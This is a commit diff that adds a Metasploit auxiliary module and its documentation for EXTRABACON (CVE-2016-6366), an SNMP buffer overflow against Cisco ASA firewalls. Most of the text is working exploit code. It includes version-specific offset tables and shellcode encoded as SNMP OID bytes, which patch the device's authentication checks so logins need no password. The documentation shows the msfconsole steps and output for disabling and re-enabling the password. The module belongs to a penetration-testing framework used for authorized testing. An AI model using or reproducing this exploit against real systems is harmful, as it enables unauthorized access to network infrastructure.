Land rapid7#7359, add EXTRABACON auxiliary module auxiliary/admin/cisco/cisco_asa_extrabacon

Author: Brent Cook

documentation/modules/auxiliary/admin/cisco/cisco_asa_extrabacon.md

@@ -0,0 +1,115 @@
+## General notes
+
+This is using improved shellcode, has less stages than the Equation Group
+version making it more reliable. This makes the SNMP payload packet ~150 less
+bytes. Also, the leaked version only supports 8.x, we have it working on 9.x
+versions.
+
+To add more version specific offsets, more details and a Lina file offset
+finder are available at:
+
+https://github.com/RiskSense-Ops/CVE-2016-6366
+
+## Partial list of supported versions
+------------------------------------------------------------
+All of the leaked versions are available in the module
+
+- 8.x
+- 8.0(2)
+- 8.0(3)
+- 8.0(3)6
+- 8.0(4)
+- 8.0(4)32
+- 8.0(5)
+- 8.2(1)
+- 8.2(2)
+- 8.2(3)
+- 8.2(4)
+- 8.2(5)
+- 8.2(5)33 `*`
+- 8.2(5)41 `*`
+- 8.3(1)
+- 8.3(2)
+- 8.3(2)39 `*`
+- 8.3(2)40 `*`
+- 8.3(2)-npe `*` `**`
+- 8.4(1)
+- 8.4(2)
+- 8.4(3)
+- 8.4(4)
+- 8.4(4)1 `*`
+- 8.4(4)3 `*`
+- 8.4(4)5 `*`
+- 8.4(4)9 `*`
+- 8.4(6)5 `*`
+- 8.4(7) `*`
+- 9.x
+- 9.0(1) `*`
+- 9.1(1)4 `*`
+- 9.2(1) `*`
+- 9.2(2)8 `*`
+- 9.2(3) `*`
+- 9.2(4) `*`
+- 9.2(4)13 `*`
+
+`*` new version support not part of the original Shadow Brokers leak
+
+`**` We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future, we'd like to incorporate these versions. Perhaps as a bool option?
+
+## Verification
+
+- Start `msfconsole`
+- `use auxiliary/admin/cisco/cisco_asa_extrabacon`
+- `set RHOST x.x.x.x`
+- `check`
+- `run`
+- ssh [email protected], you will not need a valid password
+- `set MODE pass-enable`
+- `run`
+- ssh [email protected], ensure fake password does not work
+
+## Checking for a vulnerable version
+
+```
+msf > use auxiliary/admin/cisco/cisco_asa_extrabacon
+msf auxiliary(cisco_asa_extrabacon) > set rhost 192.168.1.1
+rhost => 192.168.1.1
+msf auxiliary(cisco_asa_extrabacon) > check
+
+[+] Payload for Cisco ASA version 8.2(1) available!
+[*] 192.168.1.1:161 The target appears to be vulnerable.
+```
+
+## Disabling administrative password
+
+```
+  msf auxiliary(cisco_asa_extrabacon) > set
+set ACTION            set ConsoleLogging    set Prompt            set RHOST             set TimestampOutput
+set CHOST             set LogLevel          set PromptChar        set RPORT             set VERBOSE
+set COMMUNITY         set MODE              set PromptTimeFormat  set SessionLogging    set VERSION
+set CPORT             set MinimumRank       set RETRIES           set TIMEOUT           set WORKSPACE
+msf auxiliary(cisco_asa_extrabacon) > set MODE pass-
+  set MODE pass-disable  set MODE pass-enable
+msf auxiliary(cisco_asa_extrabacon) > set MODE pass-disable
+MODE => pass-disable
+msf auxiliary(cisco_asa_extrabacon) > run
+
+[*] Building pass-disable payload for version 8.2(1)...
+  [*] Sending SNMP payload...
+  [+] Clean return detected!
+[!] Don't forget to run pass-enable after logging in!
+[*] Auxiliary module execution completed
+```
+
+## Re-enabling administrative password
+
+```
+msf auxiliary(cisco_asa_extrabacon) > set MODE pass-enable
+MODE => pass-enable
+msf auxiliary(cisco_asa_extrabacon) > run
+
+[*] Building pass-enable payload for version 8.2(1)...
+  [*] Sending SNMP payload...
+  [+] Clean return detected!
+[*] Auxiliary module execution completed
+```

modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb

@@ -0,0 +1,199 @@
+##
+# auxiliary/admin/cisco/cisco_asa_extrabacon.rb
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::SNMPClient
+  include Msf::Auxiliary::Cisco
+
+  def initialize
+    super(
+      'Name'        => 'Cisco ASA Authentication Bypass (EXTRABACON)',
+      'Description' => %q{
+          This module patches the authentication functions of a Cisco ASA
+          to allow uncredentialed logins. Uses improved shellcode for payload.
+        },
+      'Author'      =>
+        [
+          'Sean Dillon <[email protected]>',
+          'Zachary Harding <[email protected]>',
+          'Nate Caroe <[email protected]>',
+          'Dylan Davis <[email protected]>',
+          'William Webb <william_webb[at]rapid7.com>', # initial module and ASA hacking notes
+          'Equation Group',
+          'Shadow Brokers'
+        ],
+      'References' =>
+        [
+          [ 'CVE', '2016-6366'],
+          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp'],
+          [ 'URL', 'https://github.com/RiskSense-Ops/CVE-2016-6366'],
+        ],
+      'License'     => MSF_LICENSE
+    )
+    register_options([
+      OptEnum.new('MODE', [ true, 'Enable or disable the password auth functions', 'pass-disable', ['pass-disable', 'pass-enable']])
+    ], self.class)
+
+    deregister_options("VERSION")
+    datastore['VERSION'] = '2c' # SNMP v. 2c required it seems
+
+    @asa_version_snmp = '1.3.6.1.2.1.47.1.1.1.1.10.1'
+
+    @offsets = {
+      #"9.2(4)14" => ["197.207.10.8", "118.97.40.9", "72", "0.16.185.9", "112.31.185.9", "85.49.192.137", "0.80.8.8", "240.95.8.8", "85.137.229.87"],
+      "9.2(4)13" => ["197.207.10.8", "70.97.40.9", "72", "0.16.185.9", "240.30.185.9", "85.49.192.137", "0.80.8.8", "240.95.8.8", "85.137.229.87"],
+      "9.2(4)" => ["101.190.10.8", "54.209.39.9", "72", "0.48.184.9", "192.52.184.9", "85.49.192.137", "0.80.8.8", "0.91.8.8", "85.137.229.87"],
+      "9.2(3)" => ["29.112.29.8",      # jmp_esp_offset, 0
+                   "134.115.39.9",     # saferet_offset, 1
+                   "72",               # fix_ebp,        2
+                   "0.128.183.9",      # pmcheck_bounds, 3
+                   "16.128.183.9",     # pmcheck_offset, 4
+                   "85.49.192.137",    # pmcheck_code,   5
+                   "0.80.8.8",         # admauth_bounds, 6
+                   "64.90.8.8",        # admauth_offset, 7
+                   "85.137.229.87"],   # admauth_code,   8
+
+      "9.2(2)8" => ["21.187.10.8", "54.245.39.9", "72", "0.240.183.9", "16.252.183.9", "85.49.192.137", "0.80.8.8", "64.90.8.8", "85.137.229.87"],
+      "9.2(1)" => ["197.180.10.8", "54.118.39.9", "72", "0.240.182.9", "16.252.182.9", "85.49.192.137", "0.80.8.8", "176.84.8.8", "85.137.229.87"],
+      "9.1(1)4" => ["173.250.27.8", "134.177.3.9", "72", "0.112.127.9", "176.119.127.9", "85.49.192.137", "0.48.8.8", "96.49.8.8", "85.137.229.87"],
+      "9.0(1)" => ["221.227.27.8", "134.13.3.9", "72", "0.176.126.9", "112.182.126.9", "85.49.192.137", "0.32.8.8", "240.45.8.8", "85.137.229.87"],
+      "8.4(7)" => ["109.22.18.8", "70.254.226.8", "72", "0.144.87.9", "80.156.87.9", "85.49.192.137", "0.32.8.8", "0.34.8.8", "85.137.229.87"],
+      "8.4(6)5" => ["125.63.32.8", "166.11.228.8", "72", "0.176.88.9", "96.186.88.9", "85.49.192.137", "0.32.8.8", "240.33.8.8", "85.137.229.87"],
+      "8.4(4)9" => ["173.23.5.8", "166.113.226.8", "72", "0.144.86.9", "224.154.86.9", "85.49.192.137", "0.16.8.8", "160.27.8.8", "85.137.229.87"],
+      "8.4(4)5" => ["202.250.13.8", "246.48.226.8", "72", "0.64.86.9", "16.69.86.9", "85.49.192.137", "0.16.8.8", "160.27.8.8", "85.137.229.87"],
+      "8.4(4)3" => ["164.119.8.8", "102.0.226.8", "72", "0.240.85.9", "96.252.85.9", "85.49.192.137", "0.16.8.8", "160.27.8.8", "85.137.229.87"],
+      "8.4(4)1" => ["253.74.114.8", "150.236.225.8", "72", "0.192.85.9", "176.202.85.9", "85.49.192.137", "0.16.8.8", "176.27.8.8", "85.137.229.87"],
+      "8.4(4)" => ["111.198.161.9", "181.105.226.8", "72", "0.192.85.9", "240.201.85.9", "85.49.192.137", "0.16.8.8", "176.27.8.8", "85.137.229.87"],
+      "8.4(3)" => ["13.178.7.8", "150.219.224.8", "72", "0.192.84.9", "208.207.84.9", "85.49.192.137", "0.16.8.8", "208.23.8.8", "85.137.229.87"],
+      "8.4(2)" => ["25.71.20.9", "230.222.223.8", "72", "0.128.83.9", "240.143.83.9", "85.49.192.137", "0.16.8.8", "224.19.8.8", "85.137.229.87"],
+      "8.4(1)" => ["173.58.17.9", "6.12.219.8", "72", "0.240.72.9", "240.252.72.9", "85.49.192.137", "0.48.8.8", "144.56.8.8", "85.137.229.87"],
+      "8.3(2)40" => ["169.151.13.8", "124.48.196.8", "88", "0.128.59.9", "48.137.59.9", "85.49.192.137", "0.224.6.8", "32.228.6.8", "85.137.229.87"],
+      "8.3(2)39" => ["143.212.14.8", "124.48.196.8", "88", "0.128.59.9", "176.136.59.9", "85.49.192.137", "0.224.6.8", "32.228.6.8", "85.137.229.87"],
+      "8.3(2)" => ["220.203.69.9", "252.36.195.8", "88", "0.80.54.9", "144.84.54.9", "85.49.192.137", "0.208.6.8", "16.222.6.8", "85.137.229.87"],
+      #"8.3(2)-npe" => ["125.116.12.8", "76.34.195.8", "88", "0.80.54.9", "224.81.54.9", "85.49.192.137", "0.208.6.8", "16.222.6.8", "85.137.229.87"],
+      "8.3(1)" => ["111.187.14.8", "140.140.194.8", "88", "0.112.53.9", "240.119.53.9", "85.49.192.137", "0.208.6.8", "48.221.6.8", "85.137.229.87"],
+      "8.2(5)41" => ["77.90.18.8", "188.9.187.8", "88", "0.160.50.9", "16.168.50.9", "85.49.192.137", "0.240.6.8", "16.243.6.8", "85.137.229.87"],
+      "8.2(5)33" => ["157.218.29.8", "236.190.186.8", "88", "0.80.50.9", "96.92.50.9", "85.49.192.137", "0.240.6.8", "192.242.6.8", "85.137.229.87"],
+      "8.2(5)" => ["253.13.54.9", "156.229.185.8", "88", "0.16.48.9", "96.28.48.9", "85.49.192.137", "0.240.6.8", "64.242.6.8", "85.137.229.87"],
+      "8.2(4)" => ["93.172.49.9", "236.91.185.8", "88", "0.176.43.9", "96.187.43.9", "85.49.192.137", "0.240.6.8", "16.242.6.8", "85.137.229.87"],
+      "8.2(3)" => ["45.0.7.8", "252.42.185.8", "88", "0.96.43.9", "128.111.43.9", "85.49.192.137", "0.240.6.8", "144.241.6.8", "85.137.229.87"],
+      "8.2(2)" => ["150.54.28.9", "124.0.184.8", "88", "0.224.41.9", "32.227.41.9", "85.49.192.137", "0.208.6.8", "64.221.6.8", "85.137.229.87"],
+      "8.2(1)" => ["147.242.43.9", "108.154.181.8", "88", "0.0.36.9", "240.14.36.9", "85.49.192.137", "0.208.6.8", "16.215.6.8", "85.137.229.87"],
+      "8.0(5)" => ["253.116.31.9", "204.64.171.8", "88", "0.32.24.9", "64.32.24.9", "85.49.192.137", "0.96.6.8", "128.107.6.8", "85.137.229.87"],
+      "8.0(4)32" => ["157.6.31.9", "44.20.171.8", "88", "0.176.23.9", "0.176.23.9", "85.49.192.137", "0.96.6.8", "48.105.6.8", "85.137.229.87"],
+      "8.0(4)" => ["109.188.26.9", "140.100.168.8", "88", "0.96.19.9", "128.101.19.9", "85.49.192.137", "0.96.6.8", "176.104.6.8", "85.137.229.87"],
+      "8.0(3)6" => ["191.143.24.9", "28.158.161.8", "88", "0.0.11.9", "224.1.11.9", "85.49.192.137", "0.96.6.8", "112.101.6.8", "85.137.229.87"],
+      "8.0(3)" => ["141.123.131.9", "156.138.160.8", "88", "0.128.9.9", "112.130.9.9", "85.49.192.137", "0.96.6.8", "176.96.6.8", "85.137.229.87"],
+      "8.0(2)" => ["155.222.211.8", "44.103.159.8", "88", "0.224.6.9", "32.237.6.9", "85.49.192.137", "0.80.6.8", "48.90.6.8", "85.137.229.87"]
+    }
+
+  end
+
+  def check
+    begin
+      snmp = connect_snmp
+      vers_string = snmp.get_value(@asa_version_snmp).to_s
+    rescue ::Exception => e
+      print_error("Error: Unable to retrieve version information")
+      return Exploit::CheckCode::Unknown
+    end
+
+    if @offsets[vers_string]
+      print_good("Payload for Cisco ASA version #{vers_string} available!")
+      return Exploit::CheckCode::Appears
+    end
+
+    print_warning("Received Cisco ASA version #{vers_string}, but no payload available")
+    return Exploit::CheckCode::Detected
+  end
+
+  def build_payload(vers_string, mode)
+    # adds offsets to the improved shellcode
+    # https://github.com/RiskSense-Ops/CVE-2016-6366/blob/master/shellcode.nasm
+
+    if mode == 'pass-disable'
+      always_return_true = "49.192.64.195"
+      pmcheck_bytes = always_return_true
+      admauth_bytes = always_return_true
+    else
+      pmcheck_bytes = @offsets[vers_string][5]
+      admauth_bytes = @offsets[vers_string][8]
+    end
+
+    preamble_snmp = ""
+    preamble_snmp << "49.219.49.246.49.201.49.192.96.49.210.128.197.16.128.194.7.4.125.80.187."
+    preamble_snmp << @offsets[vers_string][3]
+    preamble_snmp << ".205.128.88.187."
+    preamble_snmp << @offsets[vers_string][6]
+    preamble_snmp << ".205.128.199.5."
+    preamble_snmp << @offsets[vers_string][4]
+    preamble_snmp << "."
+    preamble_snmp << pmcheck_bytes
+    preamble_snmp << ".199.5."
+    preamble_snmp << @offsets[vers_string][7]
+    preamble_snmp << "."
+    preamble_snmp << admauth_bytes
+    preamble_snmp << ".97.104."
+    preamble_snmp << @offsets[vers_string][1]
+    preamble_snmp << ".128.195.16.191.11.15.15.15.137.229.131.197."
+    preamble_snmp << @offsets[vers_string][2]
+    preamble_snmp << ".195"
+
+    preamble_len = preamble_snmp.split('.').length
+    preamble_snmp << ".144" * (82 - preamble_len)
+
+    # cufwUrlfServerStatus
+    head = "1.3.6.1.4.1.9.9.491.1.3.3.1.1.5"
+    head << ".9.95"
+
+    finder_snmp = "139.124.36.20.139.7.255.224.144"
+
+    overflow = [head, preamble_snmp, @offsets[vers_string][0], finder_snmp].join(".")
+    return overflow
+  end
+
+  def run()
+
+    begin
+      mode = datastore['MODE']
+      session = rand(255) + 1
+
+      snmp = connect_snmp
+      vers_string = snmp.get_value(@asa_version_snmp).to_s
+
+      print_status("Building #{mode} payload for version #{vers_string}...")
+      overflow = build_payload(vers_string, mode)
+      payload = SNMP::ObjectId.new(overflow)
+
+      print_status("Sending SNMP payload...")
+      response = snmp.get_bulk(0, 1, [SNMP::VarBind.new(payload)])
+
+      if response.varbind_list
+        print_good("Clean return detected!")
+        if mode == 'pass-disable'
+          print_warning("Don't forget to run pass-enable after logging in!")
+        end
+      end
+
+    rescue ::Rex::ConnectionError
+      print_error("Connection Error: Is the target up?")
+    rescue ::SNMP::RequestTimeout
+      print_error("SNMP Error: Request Timeout, Cisco ASA may have crashed :/")
+    rescue ::SNMP::UnsupportedVersion
+      print_error("SNMP Error: Version 2c is not supported by target.")
+    rescue ::NoMethodError
+      print_error("Error: No payload available for version #{vers_string}")
+    rescue ::Interrupt
+      raise $!
+    rescue ::Exception => e
+      print_error("Error: #{e.class} #{e} #{e.backtrace}")
+    ensure
+      disconnect_snmp
+    end
+  end
+
+end